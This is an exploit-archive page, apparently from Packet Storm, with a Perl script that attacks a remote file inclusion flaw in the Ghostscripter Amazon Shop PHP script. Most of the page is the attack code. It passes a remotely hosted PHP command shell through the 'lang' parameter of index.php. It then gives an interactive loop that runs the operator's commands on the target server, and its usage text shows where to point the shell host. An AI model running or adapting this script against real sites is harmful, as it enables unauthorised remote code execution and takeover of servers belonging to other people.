exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ghostscripter Amazon Shop Remote File Inclusion

Ghostscripter Amazon Shop Remote File Inclusion
Posted Mar 5, 2009
Authored by d3b4g

Ghostscripter Amazon Shop remote file inclusion exploit.

tags | exploit, remote, code execution, file inclusion
SHA-256 | 0921c75bd2f356f5cdc90f0a99486597920ee0e322eef38d92449847567a209d

Ghostscripter Amazon Shop Remote File Inclusion

Change Mirror Download
#!/usr/bin/perl
#
#ghostscripter Amazon Shop Remote File Include Exploit
#Script :http://ghostscripter.com/amazon_shop.php
#Original Advisory:http://www.milw0rm.com/exploits/8145
#By d3b4g
#Mail:bl4ckend [at]gmail.com
#


use LWP::UserAgent;

$my_Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($my_Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
print "[shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);

$sploit = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'index.php?lang='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $sploit->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a that command in <b>/)
{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)


{
$lolreturn = $1;
$lolreturn=~ tr/[....]/[\n]/;
print "\r\n$lolreturn\n\r";
last;
}

else {print "[shell] \$";}}}last;

sub head()
{
print "\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
print " ghostscripter Amazon Shop Remote File Include Exploit\r\n";
print " Exploited by d3b4g\r\n";
print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
}
sub usage()
{
head();
print " Usage: Amazon Shop.pl [target] [cmd shell location] [cmd shell variable]\r\n\n";
print " <Site> - Full path to Amazon Shop script ex: http://www.site.com/ \r\n";
print " <cmd shell> - Path to cmd Shell ex. http://www.shellzsite.com/cmd.txt \r\n";
print " <cmd variable> - Command variable used in php shell \r\n";
print "---------------------------------------------------------------------------\r\n";
print " By bl4ckend[at]Gmail.com \r\n";
print "---------------------------------------------------------------------------\r\n";
exit();
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close